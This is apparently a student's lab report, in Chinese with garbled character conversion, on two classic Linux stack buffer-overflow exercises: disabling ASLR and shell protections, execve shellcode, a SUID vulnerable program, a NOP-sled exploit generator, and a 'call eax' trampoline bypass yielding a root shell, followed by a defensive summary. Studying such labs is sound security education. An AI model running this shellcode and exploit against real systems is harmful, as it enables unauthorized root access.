2017-2018-2 20179209《網絡攻防》第十週做業

Linux操做系統的緩衝區溢出漏洞實驗

關閉保護措施（ASLR）狀況下的緩衝區溢出

緩衝區溢出簡介

緩衝區溢出是指程序試圖向緩衝區寫入超出預分配固定長度數據的狀況。這一漏洞能夠被惡意用戶利用來改變程序的流控制，甚至執行代碼的任意片斷。這一漏洞的出現是因爲數據緩衝器和返回地址的暫時關閉，溢出會引發返回地址被重寫。

原理詳解

利用緩衝區溢出進行攻擊的原理就是經過修改內存區域，把一段惡意代碼存儲到一個buffer中，而且使這個buffer被溢出，以便當前進程被非法利用（惡意代碼執行）。
隨便往緩衝區中填東西形成它溢出通常只會獲得「分段錯誤」（Segmentation fault），我想這個錯誤應該不少編程的人都遇到過。可是若是覆蓋緩衝區的是一段精心設計的機器指令序列，它可能經過溢出，改變返回地址，將其指向本身的指令序列，從而改變程序的正常流程。

上圖是程序在內存中的映射。

程序中函數調用堆棧就是溢出漏洞的主要途徑。一個函數執行完畢，要返回時堆棧指針ESP會指向保存原來EIP的地方，而指令指針EIP指向RET指令，因此正常狀況下，RET執行後，就能夠把原來的EIP恢復，從而回到中斷前的流程。可是，保存的EIP若是被覆蓋成一個JMP指令的地址，這樣，執行POP EIP後，EIP會被改爲JMP指令的地址，即開始執行ShellCode中的指令。

實驗環境

實驗樓環境（Ubuntu linux 64位）。爲了方便觀察彙編語句，須要安裝一些用於編譯32位C程序的東西。

sudo apt-get update
sudo apt-get install lib32z1 libc6-dev-i386
sudo apt-get install lib32readline-gplv2-dev

實驗步驟

1.初始化設置

Ubuntu和其餘一些Linux系統中，使用地址空間隨機化來隨機堆（heap）和棧（stack）的初始地址，這使得猜想準確的內存地址變得十分困難，而猜想內存地址是緩衝區溢出攻擊的關鍵。所以本次實驗中，咱們使用如下命令關閉這一功能：
sudo sysctl -w kernel.randomize_va_space = 0
此外，爲了進一步防範緩衝區溢出攻擊及其它利用shell程序的攻擊，許多shell程序在被調用時自動放棄它們的特權。所以，即便你能欺騙一個Set-UID程序調用一個shell，也不能在這個shell中保持root權限，這個防禦措施在/bin/bash中實現。
linux系統中，/bin/sh實際是指向/bin/bash或/bin/dash的一個符號連接。爲了重現這一防禦措施被實現以前的情形，咱們使用另外一個shell程序（zsh）代替/bin/bash。具體操做以下：

sudo su
cd /bin
rm sh
ln -s zsh sh
exit

2.ShellCode

通常狀況下，緩衝區溢出會形成程序崩潰，在程序中，溢出的數據覆蓋了返回地址。而若是覆蓋返回地址的數據是另外一個地址，那麼程序就會跳轉到該地址，若是該地址存放的是一段精心設計的代碼用於實現其餘功能，這段代碼就是shellcode。

#include <stdio.h>
int main( ) {
char *name[2];
name[0] = ‘‘/bin/sh’’;
name[1] = NULL;
execve(name[0], name, NULL);
}

shellcode固然不是上面的c程序，由於攻擊代碼必須是機器級指令，因此選擇其彙編版本做爲本次實驗的shellcode。
\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

3.漏洞程序

把如下代碼保存爲「stac.c」文件，保存到/tmp目錄下。

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
char buffer[12];

/* The following statement has a buffer overflow problem */
strcpy(buffer, str);

return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}

上面的代碼很簡單，讀取一個名爲「badfile」的文件，並將文件內容裝入「buffer」。
編譯該程序，並設置SET-UID。命令以下：

sudo
gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c // -fno-stack-protector參數的含義是關閉棧保護機制；-z execstack 參數的意思是用於容許執行棧
chmod u+s stack
exit

4.攻擊程序

咱們的目的是攻擊上面的漏洞程序，並經過攻擊得到root權限。
把如下代碼保存爲「exploit.c」文件，保存到/tmp目錄。

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=

"\x31\xc0"    //xorl %eax,%eax
"\x50"        //pushl %eax
"\x68""//sh"  //pushl $0x68732f2f
"\x68""/bin"  //pushl $0x6e69622f
"\x89\xe3"    //movl %esp,%ebx
"\x50"        //pushl %eax
"\x53"        //pushl %ebx
"\x89\xe1"    //movl %esp,%ecx
"\x99"        //cdq
"\xb0\x0b"    //movb $0x0b,%al
"\xcd\x80"    //int $0x80
;

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);

/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

注意上面的代碼，「\x??\x??\x??\x??」處須要添上shellcode保存在內存中的地址。由於發生溢出後這個位置恰好覆蓋返回地址。
而strcpy(buffer+100,shellcode)的意思是shellcode保存在buffer+100的位置。如今咱們得去找到buffer在內存中的地址：

gdb stack
disass main

由此計算shellcode的地址：
0xffffcfc0+100(十進制) = 0xffffcfc0+0x64=0xffffd024
修改exploit.c後編譯：

實驗結果

先運行攻擊程序exploit，再運行漏洞程序stack：

經過"call eax"繞過ASLR

實驗原理

上面緩衝區溢出漏洞實驗shellcode的地址採用的靜態地址，可是如今的Ubuntu和其餘一些Linux系統中，使用地址空間隨機化（ASLR）來隨機堆（heap）和棧（stack）的初始地址，採用靜態地址攻擊顯得有很大的不足。一種經典的繞過ASLR的方法就是經過程序自身存在的"jmp 寄存器"指令，動態跳轉到shellcode，即便程序每次加載的地址不同，但程序指令間的相對運行不會變。本實驗是經過程序自己存在的「call eax」（相似jmp eax）指令跳轉到shellcode。

實驗環境：

實驗樓環境（Ubuntu linux 64位）

實驗步驟

1.配置環境

本次實驗是在32位環境中完成的，而實驗樓ubuntu是64位，因此先下載安裝32位的庫。

sudo apt-get update
sudo apt-get install lib32z1 libc6-dev-i386
sudo apt-get install lib32readline-gplv2-dev

經過linux32命令進入32位linux環境。

打開ASLR：

2.shellcode

在前一次實驗已經描述過什麼是shellcode和它的做用。下面直接貼出shellcode的C版本代碼：

#include <stdio.h> 
int main(int argc, char **argv) { 
    char *name[2]; 
    name[0] = "/bin/bash"; 
    name[1] = NULL; 
    execve(name[0], name, NULL); 
    return 0; 
}

shellcode怎麼來的： shellcode是將上面C程序對應的彙編代碼經過objdump獲取其二進制代碼獲得的。
彙編版本：

xor %edx,%edx;\
push %edx;\
push $0x68732f2f;\
push $0x6e69622f;\
mov %esp,%ebx;\
push %edx;\
push %ebx;\
mov %esp,%ecx;\
xor %eax,%eax;\
movb $0x0b,%al;int $0x80;\

二進制代碼：

\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"

3.漏洞程序

/*
    badpro.c
*/
#include <stdio.h>    
#include <string.h>    
void badfunc(char *input) {    
    char buffer[512];    
    strcpy(buffer, input);    
}    
int main(int argc, char **argv) {    
    badfunc(argv[1]);    
    return 0;    
}

上面程序完成的功能是：將main函數的第一個參數（字符串）複製到buffer中。
用下面的命令進行編譯連接生成可執行的badpro：

gcc -Wall -g -o badpro badpro.c -z execstack -m32 -fno-stack-protector

給該程序加上root權限，這樣攻擊成功後就會得到其root權限：

sudo chown root:root badpro
sudo chmod a+s badpro

4.漏洞利用

經過objdump -d badpro | grep *%eax命令查找程序中是否存在call eax或者jmp eax這樣的指令。其中「*%eax」是在寄存器前面加星號，表明這是一個絕對調用或者跳轉，也就是該命令是對一個絕對地址進行操做，也正是因爲這樣指令的存在，才使得這種攻擊成爲可能。

選擇0x08048386這個地址，做爲跳板，獲得最終的exploit的內容：ShellCode(N) + A(524-N) + \xdf\x83\x04\x08，這裏事先生成的shellcode爲25字節，所以填充了499個A。
執行以下命令：

./badpro $(perl -e 'printf "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80" . "A"x499 ."\x86\x83\x04\x08"')
/*
    perl -e 是perl在命令行中執行的命令；printf是將後面緊跟的字符串寫入標準輸出流；「A」x499是產生499個A。
*/

從上圖能夠看出，咱們已經得到了root權限。成功！

總結

經過分析漏洞，也思考了一些漏洞攻擊的防範問題。整個防範措施大概有源碼級保護方法、運行期保護方法、阻止攻擊代碼執行、增強系統保護等幾種。對於源碼保護，能夠提升警戒，在編寫程序時對於涉及緩衝區的部分進行嚴格的邊界檢查，防止溢出。也能夠利用漏洞掃描工具對源碼中可能存在緩衝區溢出漏洞的代碼部分分析，尋找bug並解決。運行期保護主要研究如何在程序運行的過程當中發現或阻止緩衝區溢出攻擊。好比數組邊界檢查，檢查數組實際長度是否超過了分配的長度，若是超過，當即進行相應的處理。阻止攻擊代碼執行，能夠設定堆棧數據段不可執行，這樣就能夠避免被攻擊。增強系統保護主要是保護系統信息、關閉不須要的服務、最小權限原則、使用系統的堆棧補丁、檢查系統漏洞並及時爲軟件打上安全補丁等。